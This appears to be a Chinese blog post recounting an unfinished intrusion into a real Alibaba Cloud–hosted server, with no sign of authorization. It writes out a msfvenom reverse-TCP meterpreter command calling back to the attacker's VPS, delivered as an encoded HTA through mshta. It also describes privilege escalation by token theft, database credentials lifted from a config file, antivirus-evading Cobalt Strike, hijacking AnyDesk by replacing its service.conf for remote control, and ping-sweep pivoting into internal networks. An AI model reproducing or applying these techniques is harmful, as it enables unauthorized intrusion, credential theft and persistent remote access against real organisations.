记一次未完成的实战内网渗透
这篇文章来自@Sin好友投稿,和我之前写的"记一次从Jboss到3389远程桌面案例"是一个目标,但我只是记录了遇到的问题,他写的更全一些,不过也不完整。
找到一个Jboss反序列化的入口点
然后执行tasklist /svc获取系统的进程,根据进程得知,目标搭建在阿里云上、并且系统中有360主动防御
那么由此可以得知,常见powershell和hta上线是没有希望的,于是想着查看一下C盘文件夹有哪些文件。
但是很可惜可能是C盘文件夹太多的缘故,并不能获取到盘符的文件夹,所以想着通过dir遍历寻找*.jsp\login.jsp这样的文件是没有希望了
那么接下来找到了3h师傅求助,他用了编码加载hta的方式解决了上线的问题,首先执行命令,生成base64的hta,然后复制这个箭头部分的文件
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=VPS地址 lport=端口号 -f raw > /tmp/shellcode1.bin
cat /tmp/shellcode1.bin | base64 -w 0
将这部分的文件复制下来,放到编写的hta文件中,替换hta文件中箭头的双引号部分
然后将hta文件上传到vps,接着利用python自带的命令,开启一个临时web
然后设置msf监听,这里设置x86的版本payload
然后在jboss反序列化工具上进行mshta命令执行,即可上线
进入到目标机器后,由于当前会话是x86,所以需要先进程迁移到64位的进程中
然后着手开始信息搜集,执行ps命令查看系统中运行哪些进程,然后发现系统中执行了一个Gserver进程,然后查看该进程目录中的文件
执行shell命令进入到终端后,使用dir命令查看该路径下的文件,发现该目录中有个xml文件
接着查看xml文件内容,在xml文件中发现,目标的数据库连接信息
于是使用数据库连接工具,连接该文件中的数据库。并激活xp_cmdshell,未进行命令执行
接下来抓取明文信息,首先进行令牌窃取到system权限
不过因为目标机器为阿里云,目前远程登陆的怕引起异地登陆提醒,所以先看一下了路由,目前机器开放了哪些网段
这里本来想用以下命令来扫描内网网段的,但是发现执行这条命令会导致msf的shell端卡死,数据库连接工具执行该命令也会卡死,索性就不在shell上执行该命令了
for /l %i in (1,1,255) do @ ping 10.x.x.%i -w 1 -n 1|find /i "ttl="于是想起了3h师傅说做好信息搜集,于是我想到去看一下桌面文件,在桌面文件上看到的文件是简体中文文件,在shell端中查看不了该类命名文件
于是还是决定上线一个cs在做后续,因为CS可以下载桌面文件,这里肯定会有人问我为啥不远程连接3389,我这里先说一下连接3389,我这里连接不上,因为可能是阿里云做了限制不允许外联,只能从别的地方下手了。
将cs做了免杀(环境存在360),使用msf上传过去,然后在shell端执行,即可上线
那么目前可以想到的就是继续做信息搜集,或者横向移动,这里决定先做信息搜集,先将桌面文件下载下来,但是这里下载后发现文件并打不开,不知道这里的lnk文件怎么变成了bat文件
思考万千,还是想从远程连接入手,于是利用cs上传了一个向日葵上去,然后执行截屏命令,但是出现了一个很尴尬的事情,程序崩溃了
然后问了下3h师傅,他发了以前的文章给我,(呜呜呜吃了偷懒和没复现的亏),具体是这样的,首先在cs中将anydesk远控软件上传上去
然后运行anydesk文件,然后在以下目录中可以找到连接文件service.conf。这里首先在我们本地anydesk中,设置一个自主访问密码
C:\Users\Administrator\AppData\Roaming\AnyDesk
然后在CS中删除目标机器上的service.conf文件
然后将本地的service.conf上传上去
然后taskkill /f /im anydes.exe 结束掉目标机器上的进程
结束掉进程后,再重新运行,即可用我们本地设置的anydesk进行连接
注意事项:这里引用3h师傅的文章,打字太累了,偷懒一下
最后就成功连接上了
然后通过域控查找的命令,可以看到当前机器不在域中,那么就要想办法先进入到一台域机器中
这里使用3h师傅之前给命令探测内网存活主机,用cs这些工具扫不出来的时候,就可以考虑使用这个
for /l %i in (1,1,255) do @ ping 192.168.2.%i -w 1 -n 1|find /i "ttl=" 
还可以,除去本机IP扫出两台存活机器,但是检测后发现目标两台机器都访问不了3389端口,不知道是该了端口还是咋的,只能去扫描这些机器下的存活端口
那么先添加条10网段的路由
扫描出45地址IP端口,这个地址端口可以尝试挨个去访问
将这些IP和端口逐个访问过后在10.x.x.145 IP上发现目标开放了WEB,并且是一个xx侠客行网站(牛逼!)
然后发现该系统由discuz3.4x搭建
但是Discuz没有前台getshell漏洞,有也是SSRF,之前复现还失败了。
后来去忙其他的事了,所以这篇文章也没写完!!!